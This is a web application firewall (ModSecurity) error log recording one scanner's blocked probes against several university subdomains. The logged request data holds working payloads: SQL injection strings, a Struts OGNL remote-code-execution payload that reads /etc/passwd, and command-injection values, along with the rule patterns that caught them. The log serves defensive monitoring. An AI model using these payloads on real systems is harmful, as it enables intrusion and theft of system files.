[Tue Aug 29 11:32:19.338227 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO1008Co-f0AAAQOv8wAAAAw"]
[Tue Aug 29 11:32:19.356949 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO1008Co-f0AAANWgZsAAAAG"]
[Tue Aug 29 11:32:21.304150 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAARD1NEAAAAH"]
[Tue Aug 29 11:32:21.311704 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAPDoEEAAAAP"]
[Tue Aug 29 11:32:21.315795 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAN9sU8AAAAJ"]
[Tue Aug 29 11:32:21.322440 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQnF@oAAAAF"]
[Tue Aug 29 11:32:21.326737 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQ9H2AAAAAK"]
[Tue Aug 29 11:32:21.344009 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQMr3YAAAAu"]
[Tue Aug 29 11:32:21.352993 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAPDoEMAAAAP"]
[Tue Aug 29 11:32:21.379969 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAARA7YsAAAAA"]
[Tue Aug 29 11:32:21.421744 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQMr3kAAAAu"]
[Tue Aug 29 11:32:21.426244 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAANsAakAAAAD"]
[Tue Aug 29 11:32:22.405370 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101sCo-f0AAAQV4WoAAAA3"]
[Tue Aug 29 11:32:22.477932 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAQ83ToAAAAI"]
[Tue Aug 29 11:32:22.499007 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101sCo-f0AAAQ83TsAAAAI"]
[Tue Aug 29 11:32:22.513544 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAPDoEsAAAAP"]
[Tue Aug 29 11:32:22.513579 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAN9sVoAAAAJ"]
[Tue Aug 29 11:32:22.545056 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAQOv9AAAAAw"]
[Tue Aug 29 11:32:22.561338 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAARD1NoAAAAH"]
[Tue Aug 29 11:32:23.310322 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAPiBrQAAAAB"]
[Tue Aug 29 11:32:23.315476 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAANwNzIAAAAb"]
[Tue Aug 29 11:32:23.320021 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAPxBYQAAAAS"]
[Tue Aug 29 11:32:23.327231 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAN9sV4AAAAJ"]
[Tue Aug 29 11:32:23.334334 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAANwNzMAAAAb"]
[Tue Aug 29 11:32:23.334982 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAQOv9IAAAAw"]
[Tue Aug 29 11:32:23.335835 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAANsAbIAAAAD"]
[Tue Aug 29 11:32:23.346910 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAN9sV8AAAAJ"]
[Tue Aug 29 11:32:23.352936 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1018Co-f0AAARD1N0AAAAH"]
[Tue Aug 29 11:32:23.353441 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAANwNzQAAAAb"]
[Tue Aug 29 11:32:23.355980 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAQUIEUAAAA2"]
[Tue Aug 29 11:32:24.325730 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO102MCo-f0AAAN9sWIAAAAJ"]
[Tue Aug 29 11:32:24.327385 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO102MCo-f0AAAQnF-gAAAAF"]
[Tue Aug 29 11:32:25.317272 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAARD1OMAAAAH"]
[Tue Aug 29 11:32:25.319830 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAN9sWQAAAAJ"]
[Tue Aug 29 11:32:25.351536 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAPDoFYAAAAP"]
